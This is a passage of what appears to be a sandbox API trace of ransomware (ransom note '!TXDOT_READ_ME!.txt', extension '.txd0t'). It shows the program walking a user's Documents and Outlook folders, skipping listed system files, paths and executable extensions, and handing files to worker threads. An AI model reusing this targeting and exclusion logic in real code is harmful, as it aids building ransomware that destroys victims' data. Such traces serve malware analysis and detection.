psz2="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" [0074.099] SetEvent (hEvent=0x418) returned 1 [0074.099] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e36670, ftCreationTime.dwHighDateTime=0x1d5cdf0, ftLastAccessTime.dwLowDateTime=0xda2c03d0, ftLastAccessTime.dwHighDateTime=0x1d59bf8, ftLastWriteTime.dwLowDateTime=0xda2c03d0, ftLastWriteTime.dwHighDateTime=0x1d59bf8, nFileSizeHigh=0x0, nFileSizeLow=0x169b6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="mDGOSIz_qds.docx", cAlternateFileName="MDGOSI~1.DOC")) returned 1 [0074.099] StrCmpW (psz1="mDGOSIz_qds.docx", psz2=".") returned 1 [0074.099] StrCmpW (psz1="mDGOSIz_qds.docx", psz2="..") returned 1 [0074.099] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.100] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="mDGOSIz_qds.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx") returned="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" [0074.100] PathFindExtensionW (pszPath="mDGOSIz_qds.docx") returned=".docx" [0074.100] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="bootsect.bak") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="iconcache.db") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="thumbs.db") returned -1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2=" ransomware ") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2=" ransom ") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="debug.txt") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="boot.ini") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="desktop.ini") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="autorun.inf") returned 1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="ntuser.dat") returned -1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="ntldr") returned -1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="ntdetect.com") returned -1 [0074.100] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="bootfont.bin") returned 1 [0074.101] StrCmpIW (psz1="mDGOSIz_qds.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.101] PathFindExtensionW (pszPath="mDGOSIz_qds.docx") returned=".docx" [0074.101] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0074.101] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.101] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.101] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.277] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.277] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" [0074.277] SetEvent (hEvent=0x408) returned 1 [0074.277] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1200a910, ftCreationTime.dwHighDateTime=0x1d587f8, ftLastAccessTime.dwLowDateTime=0xc9923070, ftLastAccessTime.dwHighDateTime=0x1d5e762, ftLastWriteTime.dwLowDateTime=0xc9923070, ftLastWriteTime.dwHighDateTime=0x1d5e762, nFileSizeHigh=0x0, nFileSizeLow=0x61d9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MRcnfzewVmw.docx", cAlternateFileName="MRCNFZ~1.DOC")) returned 1 [0074.277] StrCmpW (psz1="MRcnfzewVmw.docx", psz2=".") returned 1 [0074.277] StrCmpW (psz1="MRcnfzewVmw.docx", psz2="..") returned 1 [0074.277] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.277] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.277] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="MRcnfzewVmw.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx") returned="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" [0074.278] PathFindExtensionW (pszPath="MRcnfzewVmw.docx") returned=".docx" [0074.278] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="bootsect.bak") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="iconcache.db") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="thumbs.db") returned -1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2=" ransomware ") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2=" ransom ") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="debug.txt") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="boot.ini") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="desktop.ini") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="autorun.inf") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="ntuser.dat") returned -1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="ntldr") returned -1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="ntdetect.com") returned -1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="bootfont.bin") returned 1 [0074.278] StrCmpIW (psz1="MRcnfzewVmw.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.278] PathFindExtensionW (pszPath="MRcnfzewVmw.docx") returned=".docx" [0074.278] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0074.278] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.278] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.278] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.288] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.288] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" [0074.288] SetEvent (hEvent=0x410) returned 1 [0074.288] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0074.288] StrCmpW (psz1="My Music", psz2=".") returned 1 [0074.288] StrCmpW (psz1="My Music", psz2="..") returned 1 [0074.288] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0074.288] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0074.288] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0074.288] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0074.288] StrCmpW (psz1="My Shapes", psz2=".") returned 1 [0074.288] StrCmpW (psz1="My Shapes", psz2="..") returned 1 [0074.288] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0074.288] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0074.288] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0074.289] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4069f0, ftCreationTime.dwHighDateTime=0x1d5f0c3, ftLastAccessTime.dwLowDateTime=0x5d35a670, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x5d35a670, ftLastWriteTime.dwHighDateTime=0x1d5e1f2, nFileSizeHigh=0x0, nFileSizeLow=0x236f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NUZN31jJgT6UykF_.ots", cAlternateFileName="NUZN31~1.OTS")) returned 1 [0074.289] StrCmpW (psz1="NUZN31jJgT6UykF_.ots", psz2=".") returned 1 [0074.289] StrCmpW (psz1="NUZN31jJgT6UykF_.ots", psz2="..") returned 1 [0074.289] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="NUZN31jJgT6UykF_.ots", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots") returned="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" [0074.289] PathFindExtensionW (pszPath="NUZN31jJgT6UykF_.ots") returned=".ots" [0074.289] StrCmpW (psz1=".ots", psz2=".txd0t") returned -1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="bootsect.bak") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="iconcache.db") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="thumbs.db") returned -1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2=" ransomware ") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2=" ransom ") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="debug.txt") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="boot.ini") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="desktop.ini") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="autorun.inf") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="ntuser.dat") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="ntldr") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="ntdetect.com") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="bootfont.bin") returned 1 [0074.289] StrCmpIW (psz1="NUZN31jJgT6UykF_.ots", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.289] PathFindExtensionW (pszPath="NUZN31jJgT6UykF_.ots") returned=".ots" [0074.289] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ots") returned 0x0 [0074.289] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.290] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.290] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.296] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.296] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" [0074.296] SetEvent (hEvent=0x418) returned 1 [0074.296] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0074.296] StrCmpW (psz1="Outlook Files", psz2=".") returned 1 [0074.296] StrCmpW (psz1="Outlook Files", psz2="..") returned 1 [0074.296] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.296] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.296] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Outlook Files", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0074.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system32\\") returned 0x0 [0074.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.296] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\local\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\boot\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\perflogs\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\programdata\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\drivers\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\wsus\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="crypt_detect") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="cryptolocker") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="ransomware") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\WINDOWS") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.297] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files") returned 0x0 [0074.297] GetProcessHeap () returned 0xe30000 [0074.297] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed31f0 [0074.297] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0074.297] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*" [0074.297] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0074.298] StrCmpW (psz1=".", psz2=".") returned 0 [0074.298] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.298] StrCmpW (psz1="..", psz2=".") returned 1 [0074.298] StrCmpW (psz1="..", psz2="..") returned 0 [0074.298] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0074.298] StrCmpW (psz1="kkcie@kdj.kd.pst", psz2=".") returned 1 [0074.298] StrCmpW (psz1="kkcie@kdj.kd.pst", psz2="..") returned 1 [0074.298] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0074.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0074.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="kkcie@kdj.kd.pst", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" [0074.298] PathFindExtensionW (pszPath="kkcie@kdj.kd.pst") returned=".pst" [0074.298] StrCmpW (psz1=".pst", psz2=".txd0t") returned -1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="bootsect.bak") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="iconcache.db") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="thumbs.db") returned -1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2=" ransomware ") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2=" ransom ") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="debug.txt") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="boot.ini") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="desktop.ini") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="autorun.inf") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="ntuser.dat") returned -1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="ntldr") returned -1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="ntdetect.com") returned -1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="bootfont.bin") returned 1 [0074.298] StrCmpIW (psz1="kkcie@kdj.kd.pst", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.298] PathFindExtensionW (pszPath="kkcie@kdj.kd.pst") returned=".pst" [0074.299] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pst") returned 0x0 [0074.299] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.299] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.299] FileTimeToSystemTime (in: lpFileTime=0x552f1a4, lpSystemTime=0x552f168 | out: lpSystemTime=0x552f168) returned 1 [0074.299] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f168, lpLocalTime=0x552f178 | out: lpLocalTime=0x552f178) returned 1 [0074.299] FileTimeToSystemTime (in: lpFileTime=0x552f1ac, lpSystemTime=0x552f130 | out: lpSystemTime=0x552f130) returned 1 [0074.299] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f130, lpLocalTime=0x552f120 | out: lpLocalTime=0x552f120) returned 1 [0074.299] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.310] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.310] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" [0074.311] SetEvent (hEvent=0x408) returned 1 [0074.311] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x750e9f, 